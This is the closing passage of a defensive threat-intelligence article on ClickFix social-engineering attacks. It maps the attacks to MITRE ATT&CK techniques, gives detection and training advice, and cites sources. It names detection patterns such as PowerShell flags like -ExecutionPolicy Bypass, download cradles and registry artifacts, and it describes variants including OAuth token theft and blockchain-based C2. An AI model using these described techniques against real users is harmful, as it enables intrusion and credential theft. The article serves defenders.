T1071.004 Application Layer Protocol: DNS DNS-based staging variant uses DNS TXT lookups against attacker-controlled resolvers to deliver second-stage payload
T1070.003 Indicator Removal: Clear Command History Post-execution deletion of RunMRU registry key observed in COLDRIVER campaigns to remove forensic trace of Win+R execution
T1528 Steal Application Access Token ConsentFix variant; victim is tricked into pasting a localhost OAuth authorization code URL into an attacker-controlled page, granting the attacker persistent access to the victim's Microsoft account via Azure CLI without any password or MFA interaction
T1071.001 Application Layer Protocol: Web Protocols (Blockchain C2) EtherHiding technique observed in LeakNet and ClearFake-adjacent campaigns; next-stage payloads and C2 commands are retrieved via Binance BNB Smart Chain smart contracts, bypassing domain-based blocking and infrastructure takedowns

The T1204.002 / T1204.001 (User Execution) mapping is the most significant from a defensive standpoint. Because the user performs the final execution step, many automated defenses do not trigger. The attack is specifically designed to make the user the last line of defense — and to convince that user that what they are doing is legitimate and helpful. Proofpoint's April 2025 analysis of state-sponsored ClickFix adoption concluded that the technique is not fundamentally changing those actors' campaigns — it is being inserted into the installation and execution stages of infection chains that already existed, which means that detection at the execution layer is the only reliable chokepoint regardless of which threat actor is operating it.

Key Takeaways

  1. Detect at execution, not at delivery: ClickFix bypasses email and file-based controls. Your detection must live in EDR telemetry — specifically in process creation events watching for PowerShell, mshta, cmd, or net use launched from explorer.exe with suspicious flag combinations. The RunMRU registry key is a complementary forensic surface that caught the March 2026 WebDAV variant when EDR missed it entirely.
  2. Behavioral IOCs outlast network IOCs: Specific C2 domains and IPs rotate too fast to be operationally useful as your primary detection mechanism. The command-line patterns — -ExecutionPolicy Bypass, -WindowStyle Hidden, encoded commands, download cradles — and the RunMRU registry artifacts are consistent across campaigns and threat actors. Build detections on these patterns and hunt the registry, not just the process tree.
  3. The variant list is growing and each variant has different forensic artifacts: Classic ClickFix leaves evidence in RunMRU and the explorer.exe process chain. FileFix leaves evidence in TypedPaths. TerminalFix leaves no RunMRU artifact at all. The WebDAV net use variant bypassed Defender for Endpoint in a confirmed 2026 incident. A single detection rule covering only the original pattern misses most of the current threat surface. Hunt across all three registry keys and all relevant parent process relationships.
  4. The actor list spans criminal and nation-state operators: ClickFix started as a commodity crimeware technique and was adopted by Kimsuky, MuddyWater, APT28, UNK_RemoteRogue, and COLDRIVER within roughly a year. Any organization that would be targeted by espionage actors, ransomware operators, or information stealers is a viable ClickFix target. The Microsoft 2025 Digital Defense Report's figure of 47% of initial accesses coming from ClickFix makes this a category-one detection priority.
  5. User awareness is a meaningful control — but the training needs to keep up with the variant list: Unlike many malware delivery techniques, ClickFix requires the user to actively follow multi-step instructions. Security awareness training that specifically addresses the "copy this command and paste it in Run" pattern can interrupt the chain where technical controls have gaps. But that training is now insufficient on its own. The Win+X shortcut to Windows Terminal bypasses awareness programs built entirely around Win+R — and Microsoft confirmed in March 2026 that attackers are using this variant specifically to sidestep user training that focuses on the Run dialog. ConsentFix bypasses endpoint-focused training entirely because there is no command to paste and no terminal to open — just a URL in a browser. Extend training to cover three distinct scenarios: (1) any website that prompts Win+R or Win+X and paste; (2) any prompt to open Terminal on macOS; (3) any site — including search results — that asks you to copy and paste a URL containing a login token or authorization code. Train users to treat Cloudflare's verification interface as the canonical phishing vector it has become. Extend that training to macOS users: the Matryoshka and AMOS variants deliver via the same psychological mechanism and now operate with fileless execution and API-gated C2.
  6. Restrict the Run dialog, PowerShell, and WebDAV where operationally feasible: Application control policies, AppLocker or Windows Defender Application Control rules, and PowerShell Constrained Language Mode all reduce the effectiveness of ClickFix. Where these cannot be applied broadly, consider Group Policy to disable the Win+R Run dialog for non-administrative users. For the WebDAV variant, consider blocking outbound WebDAV connections to external IPs at the network perimeter. Block newly registered domains (under 30 days old) as a layered control — this directly targets the infrastructure pattern common across commodity ClickFix campaigns.

ClickFix demonstrates that the effective attack techniques are often the simplest architecturally. There is no novel exploit here, no zero-day, no sophisticated persistence mechanism in the initial stage. It is a social engineering script that gets a human being to do the one thing that automated defenses are specifically not watching for: type a command themselves. The technique has now been adopted across criminal ecosystems and nation-state operations on three continents, expanded to macOS, evolved into at least four named variants, and is being actively sold as a builder product on dark web forums. Detection requires telemetry at the execution layer, hunting logic anchored to behavioral patterns rather than known-bad hashes, registry artifact analysis, and a workforce trained to recognize what the prompt looks like across all its forms.

Sources
  1. Proofpoint Threat Research (Miller, D. & Madjar, T.). "A Clipboard Hijacking Technique Delivers Multiple Malware Payloads." Proofpoint, May 2024. https://www.proofpoint.com/us/blog/threat-insight/clipboard-hijacking-delivers-multiple-malware-payloads
  2. Proofpoint Threat Research (Naumaan, S. et al.). "Around the World in 90 Days: State-Sponsored Actors Try ClickFix." Proofpoint, April 17, 2025. https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix
  3. Microsoft Threat Intelligence. "Think Before You ClickFix: Analyzing the ClickFix Social Engineering Technique." Microsoft Security Blog, August 21, 2025. https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
  4. Microsoft Threat Intelligence. "Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging." February 2026. https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html
  5. ANY.RUN Malware Trends Tracker. "LummaC2 / Lumma Stealer via Fake CAPTCHA." Observed campaigns, 2024–2025. https://any.run/malware-trends/
  6. eSentire Threat Response Unit. "ClickFix: How to Infect Your PC in Three Easy Steps." eSentire, 2024. https://www.esentire.com/blog/clickfix-how-to-infect-your-pc-in-three-easy-steps
  7. Huntress Threat Intelligence. "Don't Sweat the ClickFix Techniques: Variants and Detection Evolution." Huntress Labs, September 2025. https://www.huntress.com/blog/dont-sweat-clickfix-techniques
  8. Unit 42 (Palo Alto Networks). "Fix the Click: Preventing the ClickFix Attack Vector." August 2025. https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
  9. Check Point Research. "FileFix: The New Social Engineering Attack Building on ClickFix Tested in the Wild." July 2025. https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/
  10. Trend Micro MDR. "Through the Lens of MDR: Analysis of KongTuke's ClickFix Abuse of Compromised WordPress Sites." March 2026. https://www.trendmicro.com/en_us/research/26/c/kongtuke-clickfix-abuse-of-compromised-wordpress-sites.html
  11. Atos Security Research. "Investigating a New Click-Fix Variant." March 2026 (via The Hacker News). https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html
  12. ReliaQuest Threat Research (Keyes, J. & Wirth, D.). "Casting a Wider Net: ClickFix, Deno, and LeakNet's Scaling Threat." ReliaQuest, March 2026. https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat
  13. ESET Threat Prevention Labs. "ClickFix Attacks Surge 517% in 2025." June 2025. https://www.infosecurity-magazine.com/news/clickfix-attacks-surge-2025/
  14. Sophos X-Ops. "Evil Evolution: ClickFix and macOS Infostealers." March 2026. https://www.sophos.com/en-us/blog/evil-evolution-clickfix-and-macos-infostealers
  15. Center for Internet Security (CIS) Cyber Threat Intelligence. "ClickFix: An Adaptive Social Engineering Technique." 2025. https://www.cisecurity.org/insights/blog/clickfix-an-adaptive-social-engineering-technique
  16. CSO Online. "ClickFix Techniques Evolve in New Infostealer Campaigns." March 2026. https://www.csoonline.com/article/4145123/clickfix-techniques-evolve-in-new-infostealer-campaigns.html
  17. Detection.FYI / SigmaHQ. "Potential ClickFix Execution Pattern — Registry" and "RunMRU Registry Key Deletion." Nextron Systems (Poudel, S.), 2025. https://detection.fyi/sigmahq/sigma/windows/registry/registry_set/registry_set_potential_clickfix_execution/
  18. MITRE ATT&CK Framework. Techniques T1204.002, T1204.001, T1059.001, T1218.005, T1105, T1027, T1566.002, T1608.004, T1140, T1021.002, T1071.001, T1071.004, T1070.003, T1528. https://attack.mitre.org
  19. Dark Reading (Nelson, N.). "'JackFix' Attack Circumvents ClickFix Mitigations." November 2025. https://www.darkreading.com/threat-intelligence/jackfix-attack-clickfix-mitigations
  20. Push Security. "ConsentFix: Browser-Native ClickFix Hijacks OAuth Grants." December 2025. https://pushsecurity.com/blog/consentfix
  21. The Hacker News. "ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services." January 2026. https://thehackernews.com/2026/01/clickfix-attacks-expand-using-fake.html
  22. CSO Online. "ClickFix Attackers Using New Tactic to Evade Detection, Says Microsoft." March 2026. https://www.csoonline.com/article/4141923/clickfix-attackers-using-new-tactic-to-evade-detection-says-microsoft.html
← all articles